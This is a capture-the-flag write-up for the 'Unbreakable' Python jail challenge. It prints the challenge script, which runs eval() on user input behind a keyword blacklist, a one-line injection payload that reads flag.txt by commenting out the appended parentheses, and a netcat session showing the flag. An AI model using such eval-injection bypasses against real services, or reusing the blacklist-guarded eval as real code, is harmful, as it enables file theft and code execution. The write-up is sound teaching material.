Unbreakable
Think you can escape my grasp? Challenge accepted! I dare you to try and break free, but beware, it won’t be easy. I’m ready for whatever tricks you have up your sleeve!
Files:
Writeup by: Stig Rune Grønnestad
Recon
Python script, let’s take a look at it.
blacklist = [ ';', '"', 'os', '_', '\\', '/', '`',
' ', '-', '!', '[', ']', '*', 'import',
'eval', 'banner', 'echo', 'cat', '%',
'&', '>', '<', '+', '1', '2', '3', '4',
'5', '6', '7', '8', '9', '0', 'b', 's',
'lower', 'upper', 'system', '}', '{' ]
while True:
ans = input('Break me, shake me!\n\n$ ').strip()
if any(char in ans for char in blacklist):
print(f'\n{banner1}\nNaughty naughty..\n')
else:
try:
eval(ans + '()')
print('WHAT WAS THAT?!\n')
except:
print(f"\n{banner2}\nI'm UNBREAKABLE!\n")
The script takes input, checks if it contains any of the characters in the blacklist, and if it does, it prints Naughty naughty... If it doesn’t, it tries to evaluate the input as a function, and if it fails, it prints I'm UNBREAKABLE!. The eval function appends () to the input, so we need to input a function name without parentheses… or maybe we can comment it out?
Solver
print(open('flag.txt','r').read())#
Executing
└─$ nc 94.237.59.119 59639
Break me, shake me!
$ print(open('flag.txt','r').read())#
HTB{3v4l_0r_3vuln??}
WHAT WAS THAT?!
Break me, shake me!
$
Flag
HTB{3v4l_0r_3vuln??}